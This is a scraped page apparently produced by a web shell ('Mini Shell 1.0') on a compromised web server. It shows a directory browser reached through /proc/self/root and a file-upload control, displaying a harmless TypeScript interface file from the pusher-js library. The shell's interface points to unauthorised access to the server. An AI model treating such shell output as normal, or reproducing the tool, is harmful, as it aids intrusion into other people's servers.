HOME


Mini Shell 1.0
Redirecting to https://devs.lapieza.net/iniciar-sesion Redirecting to https://devs.lapieza.net/iniciar-sesion.
DIR: /proc/self/root/var/www/devs.lapieza.net/node_modules/pusher-js/src/core/channels/
Upload File :
Current File : //proc/self/root/var/www/devs.lapieza.net/node_modules/pusher-js/src/core/channels/channel_table.ts
import Channel from './channel';

interface ChannelTable {
  [index: string]: Channel;
}

export default ChannelTable;